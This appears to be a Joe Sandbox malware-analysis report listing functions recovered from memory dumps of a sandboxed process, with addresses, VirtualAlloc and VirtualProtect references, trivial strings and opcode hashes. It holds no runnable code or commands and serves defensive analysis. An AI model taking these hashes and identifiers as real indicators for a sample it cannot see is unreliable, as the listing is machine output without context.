Source File: 0000002B.00000002.2458791969.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction ID: 8c2e05ee72fe3965e5269d14b0a09a495a0201150d3fcebb8ffedbbbfcc4bcaf
Opcode Fuzzy Hash: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction Fuzzy Hash: D4516D30D0874D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E7255DB74A885CB81

Function 00007FFD9BAC3B4D Relevance: 1.5, APIs: 1, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BAC3C6F

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction ID: 41277c795239166d6de7c874eab3a7e7acb837bd9bf8348737cbedbe6da44ab4
Opcode Fuzzy Hash: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction Fuzzy Hash: 99515D7090965C8FDF94EFA8D845BE9BBF1FB69310F0041AAD04DE3252DB74A9858B40

Function 00007FFD9BB0DD61 Relevance: 1.4, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0DE9A

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction ID: c0f413b4131cd20d5fa6aebacb022841f0d5e993a2974be1526aa6b47879c83d
Opcode Fuzzy Hash: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction Fuzzy Hash: 38515A31B1DA8E4FEF99DB6884655B977E0FF54358B0006FAE45CCB1EBDE24A9018340

Function 00007FFD9BB0D0A1 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 00007FFD9BB0D0AC

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 8d913e78a03f40ca6b63c0478eaec239f6413ea7bda9e9e9577fce7c891514d3
Instruction ID: 1204ebde055354718062f2b8373c751f84a207983a4af1dd0f46af0ba3cc7f72
Opcode Fuzzy Hash: 8d913e78a03f40ca6b63c0478eaec239f6413ea7bda9e9e9577fce7c891514d3
Instruction Fuzzy Hash: 12413970E1961D8FEB68DB98C8A57A8B7F1FB58314F1001B9D44DD22A5DF346982CB01

Function 00007FFD9BB0DCBD Relevance: 1.3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BB0DCCA

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
Instruction ID: 2d84c5bc1b79f4c8cf9387dcf4839af0fab892cb1a736461c2943114052cb3a2
Opcode Fuzzy Hash: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
Instruction Fuzzy Hash: D811D621B1DE1D0BDFA8995C546927A77C1FB9832570102BAE84DD32E9DD19AC014380

Function 00007FFD9BB0C746 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BB0C78A

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
Instruction ID: 72c41339f1ca5962bdc52df3006f1c3ce0283bc0097bcc3ab8c151859c991c0c
Opcode Fuzzy Hash: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
Instruction Fuzzy Hash: E121057160EBC95FD7598668D4202767BA0FF89254F4901FFE0C8CB2FBCB6999048342

Function 00007FFD9BB06219 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0622A

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
Instruction ID: ec30bc578e43b78afa15ff034ad899b1d84318696788513aec17f9b7ad31dfe5
Opcode Fuzzy Hash: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
Instruction Fuzzy Hash: 32111B30918A4D8FCF85EF68C859AE97BF0FF28305F0145AAE859D72A1DB35A554CB80

Function 00007FFD9BB06139 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0614A

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
Instruction ID: cb3c79f513014a11bbf3273eab30b52dca90e989e80685e453905a562d1a8d34
Opcode Fuzzy Hash: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
Instruction Fuzzy Hash: 70115B30918A8D8FCF85EF68C859AE97BF0FF28304F0141AAE459D72A1DB34E554CB80

Function 00007FFD9BAB4DE8 Relevance: 1.3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{, xrefs: 00007FFD9BAB4E35

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: 31641526a9de5fc97408a99c1f9dd36762377942738613e0c6c54f2fc05af0ec
Instruction ID: 561ea87afcf268a97939090c203d5a62fb8a698028b575079ce5ec66c3e1316b
Opcode Fuzzy Hash: 31641526a9de5fc97408a99c1f9dd36762377942738613e0c6c54f2fc05af0ec
Instruction Fuzzy Hash: D3112830E0596D8FEB74DB19CC546E9B7B1EB94312F1082EAD41DE22A5DE782E818F44

Function 00007FFD9BB06CE9 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB06CFA

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
Instruction ID: 9cf3427986f1fd3ba98fa97df2bc6cb1292ba1059c076b9117cf215d50f90b08
Opcode Fuzzy Hash: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
Instruction Fuzzy Hash: 6D012130918A8D8FCF85EF68C858AEA7BF0FF25304F4545AAD419D72A6D734D554CB80

Function 00007FFD9BAF232F Relevance: 1.3, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAF235D

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 8218a72b98846d5faddaad54393c3486cfb5fd70485d8ff1b8e68c6a84701fa5
Instruction ID: 93d069c0fe8571fb8d36f4533def00cae511bd5a50e88069cd89b639ca377e67
Opcode Fuzzy Hash: 8218a72b98846d5faddaad54393c3486cfb5fd70485d8ff1b8e68c6a84701fa5
Instruction Fuzzy Hash: 8B014070E0561D8FDB64CB84D4947E9B7F1FBA8361F1443A6C409E2264C7745A81CB10

Function 00007FFD9BB04DF9 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB04E0A

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
Instruction ID: 9a345e4d1c1547a241727165fbcb8985f970d7575c2b10897d51f2680a6e73ac
Opcode Fuzzy Hash: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
Instruction Fuzzy Hash: 7BF0AF6091E7899FE765AB6048696F87FB0FF19304F4945FBE448C60E7DA2852448712

Function 00007FFD9BB1CE40 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bb0f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab74fb48bf004f4a601a394828da792f1378c360b05a042bbaf1a0a4f025e9e
Instruction ID: 9f40c993843d4ee73863f2a464174a8f113ca881851c7cbc01b9ead4a5c3a52a
Opcode Fuzzy Hash: 6ab74fb48bf004f4a601a394828da792f1378c360b05a042bbaf1a0a4f025e9e
Instruction Fuzzy Hash: DCC10C71A19A5D8FDBA4EF58C8A5BE8B3B1FB58304F5151B9D00DE7292DE346A80CB40

Function 00007FFD9BB1CDFD Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bb0f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4c0f7cfee50856bb8d25aa1f8cfb712c51f5e0d60b4e297aa44ba9e2532d70
Instruction ID: 69b107c99f9e832fa9fdb9f98aad25f9538c1fb7f8ee0a91422d7a8727e3a5b8
Opcode Fuzzy Hash: 0d4c0f7cfee50856bb8d25aa1f8cfb712c51f5e0d60b4e297aa44ba9e2532d70
Instruction Fuzzy Hash: 0CB11C71A1995D8FDBA4EF58C8A57E8B3A1FF59304F5151B9D00DD72E2CE346A80CB40

Function 00007FFD9BAEFC79 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063dd40d20663a10445f1dfda84a5c90f95f7a099ce7653fcb753c945f82071a
Instruction ID: 21c7d274cfeb454d3f1bc6b2e156dc5da0a88d6c4cf6b291fdd7addea2b1d214
Opcode Fuzzy Hash: 063dd40d20663a10445f1dfda84a5c90f95f7a099ce7653fcb753c945f82071a
Instruction Fuzzy Hash: EB91EA71E09A1D8FDBA4EF58C8A4BA977B2FF58300F5041AAD01DD72A5CA35AD85CF40

Function 00007FFD9BAFBD6D Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5525d0033e8b343f08abeb6dc3a5ba1edd569d666c97870d9280d51e616caa2f
Instruction ID: 6420f204c0ad9444ad72352b6e805d4d1c5cf7aa27a6fe51c902f2c19646afa9
Opcode Fuzzy Hash: 5525d0033e8b343f08abeb6dc3a5ba1edd569d666c97870d9280d51e616caa2f
Instruction Fuzzy Hash: BD519D30B0DA4D8FEB64DB98C8646E8BFB1FF59310F4541BAD00DD32A1CAB46A84CB41

Function 00007FFD9BAC9079 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bac7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
Instruction ID: 41da8376c9f57bf9ccad964f653a8c3e9b7d2ad0ca53639703eeac63fe96854d
Opcode Fuzzy Hash: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
Instruction Fuzzy Hash: 70519030A0964D9FCF84EF58D898AED7BF1FF59311B0601A6E409E7261D674E990CB90

Function 00007FFD9BB0D80E Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b0f154148aaf215075ab62bb654c025e6be7a8375200d47d523f17bbea4aa5
Instruction ID: 84d3568504e59e6a2522548496f95ff16c217039b518a89d6d1bcb78e2e7a967
Opcode Fuzzy Hash: e2b0f154148aaf215075ab62bb654c025e6be7a8375200d47d523f17bbea4aa5
Instruction Fuzzy Hash: 15313E71E0DA5D4EDB98DA8C84A9BB8B7E1FB68354F040169D44DE72E6CE346880CB00

Function 00007FFD9BACFE50 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bacb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 517099bd5c00a431d80254afabef727b91e71514ac2e19d181047e71be19d984
Instruction ID: 75d00d98a2c563f9ac3c7a5e6cb0018f20cdd8264b25fbb2f2687eded838a5b0
Opcode Fuzzy Hash: 517099bd5c00a431d80254afabef727b91e71514ac2e19d181047e71be19d984
Instruction Fuzzy Hash: 6731266244E3C94FD7138B749CB16E17FB0AF13214F0A86DBD4C48B5E3D2685A1AC762

Function 00007FFD9BB0BB84 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6563cac060ddb8351c828db05ffcb705d4d8015db9f21c529acb9e609dda3b
Instruction ID: ebb5dfd9cecf6051b4eacfbe0be27fddf33d34455d57f25e433edc235e107639
Opcode Fuzzy Hash: ff6563cac060ddb8351c828db05ffcb705d4d8015db9f21c529acb9e609dda3b
Instruction Fuzzy Hash: E9310C71E0A61D8FEBB8DB5889A57B877A1FB58314F1101B9C04ED22A5DF786A81CB00

Function 00007FFD9BAC8D09 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bac7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f64a35c752763dcc9d7f2a02f8fcb45b1cf638a03f32dc104ad82360bc502e2
Instruction ID: dc43921295ddbc39b4f82e12f597bd756c1e61b46e6b13189c1430741dc628a7
Opcode Fuzzy Hash: 9f64a35c752763dcc9d7f2a02f8fcb45b1cf638a03f32dc104ad82360bc502e2
Instruction Fuzzy Hash: 81318D30A0964D8FCB55DF58C454AFE7BB1FF58314F02026AE849E3290CB34E940CB80

Function 00007FFD9BAEB9DD Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3260b71e5462a0af0844e88ab3068efc5067c77bc3870de3108781c5bcfe053
Instruction ID: 228089810e52467b42dbb6ce3415c33feac000c4d2a4ad711f5ff9ad68abe5a6
Opcode Fuzzy Hash: c3260b71e5462a0af0844e88ab3068efc5067c77bc3870de3108781c5bcfe053
Instruction Fuzzy Hash: DB21FD71E0A60E8FDB64DF54C8A42FE77A2FF64310F51017AC408D32A5DA34AA16CBC0

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4600d65ef11e2fbfce4e378f0c1f64cb0f81ef90b2e96b7a2e6335a39022c2b
Instruction ID: adf38bb036f1cc51eeeaca99dac1c8334db2bbde0c6bc422e5cae47a2905dd00
Opcode Fuzzy Hash: f4600d65ef11e2fbfce4e378f0c1f64cb0f81ef90b2e96b7a2e6335a39022c2b
Instruction Fuzzy Hash: 26210635B0E2AE4FE332ABA9CC212ED7B60EF42310F0645B3C1649B1E2D77816058B95

Function 00007FFD9BAB5F11 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140a7ab74e19e221b9cddc5f27bef9896c9e2c1396bda23b17b1e9cb0923f750
Instruction ID: 74413b986c1259080f445d68bed94f6aa25774e09f876d3ca150861dce37583b
Opcode Fuzzy Hash: 140a7ab74e19e221b9cddc5f27bef9896c9e2c1396bda23b17b1e9cb0923f750
Instruction Fuzzy Hash: A9319570E0D62D8EEBB9DB55C8687E8B7B1FB55301F4141E9D01DA22A1DBB86AC4CF01

Function 00007FFD9BACD279 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bacb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968ec93681cc3eb2325268fdf02b4f35751dbe938d574727bd0b68fecebf9a0d
Instruction ID: 32d805d4c76fc9e5465af70a1ac6fcb7ddd51f97ddb6e8d8ecc4b3348e5deb18
Opcode Fuzzy Hash: 968ec93681cc3eb2325268fdf02b4f35751dbe938d574727bd0b68fecebf9a0d
Instruction Fuzzy Hash: BB213071E0A50D8BEBA8EB48C8A5AB973B2FF54354F1041B9D01D972A6CE35AD81CB40

Function 00007FFD9BAEBB04 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d5f8b0aa33d79fabdc73161d94355aa4871b6f162965ec692314d17b4e125f
Instruction ID: 34ed6440251cc6f0f9327e69789ac2ac2d1a29992b4e8c87aff15783e2f71823
Opcode Fuzzy Hash: 55d5f8b0aa33d79fabdc73161d94355aa4871b6f162965ec692314d17b4e125f
Instruction Fuzzy Hash: 54215971E0550ECFDB54EF94C4986EDB7B1EB54311F50013AC419A72A4DB75A981CB80

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afb888862aa3c5d23c73d0f16a692354d20401ab72d639681f5c52cde6e547d
Instruction ID: 6704e071f0789f29deda4c12d2919e5cc5804ea2b7609e89cf7044c2fc5883f5
Opcode Fuzzy Hash: 2afb888862aa3c5d23c73d0f16a692354d20401ab72d639681f5c52cde6e547d
Instruction Fuzzy Hash: E611E631B0E6AD4FE722ABA4C8212E97B70EF42310F0545B3D154DB1E3DA7816058B95

Function 00007FFD9BB07580 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e9cb4224b62131384b64bb9b12e76b7e871e02ecf97cba3ca0103280cfc169b
Instruction ID: f71bfcccf382a1c5d1e9faa2055b8541fcd3df2d524b34d49e81e0916c5e6278
Opcode Fuzzy Hash: 4e9cb4224b62131384b64bb9b12e76b7e871e02ecf97cba3ca0103280cfc169b
Instruction Fuzzy Hash: B8216D71E0AA1D8EEBA4DB99C855BBCB7E1FF58304F1582B5C04DA32A5CA3469C18F50

Function 00007FFD9BB0A9A1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34078259a982f320c1293b7d616f410464badf07af43a2272a4db21ef057a261
Instruction ID: 656755e1e1ff7b80a76ad59fd8c92d79fde2a1aae35e454cc56f8aa2f170c19a
Opcode Fuzzy Hash: 34078259a982f320c1293b7d616f410464badf07af43a2272a4db21ef057a261
Instruction Fuzzy Hash: 58211831E0911D8FEB64DB98C958BED77F1FB18304F144575D049E22D5DA38AA81DB00

Function 00007FFD9BAB5D16 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059e00146dc1936946aac480341b740f3ecde372044a715acbe3853baf07ab1a
Instruction ID: 629b2ec12d480bb3baa2f7388185bec7cc6f31b92a8d8eb7e852cad2b1199b59
Opcode Fuzzy Hash: 059e00146dc1936946aac480341b740f3ecde372044a715acbe3853baf07ab1a
Instruction Fuzzy Hash: 1821C670E0A62E8EEBB4DB55C8647E8B7B1FB15300F5141F9D01DA26A1DBB87B818F01

Function 00007FFD9BAB5D1B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
Instruction ID: e373fefb8118e1e4e032d9954f87116d46e1461a261373e44bf138f7d0cc0d65
Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
Instruction Fuzzy Hash: 8321A370E1A23D8EDBB5DB65C8687A8B6B1EB15301F4141FA941DA22A1DB786B80DF00

Function 00007FFD9BB1D659 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bb0f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06102b77239baab3bbe767db714eb9ef9bdf16ee98c6c88d61d1857d38ff07b
Instruction ID: 352fc604916749067ff20cdd8279736be5c48802f08275a131107f7ccfd294a0
Opcode Fuzzy Hash: a06102b77239baab3bbe767db714eb9ef9bdf16ee98c6c88d61d1857d38ff07b
Instruction Fuzzy Hash: 47111F70918A4D8FCF45EF58C8999E97BF0FF28305F0501AAD418D72A1D734E554CB81

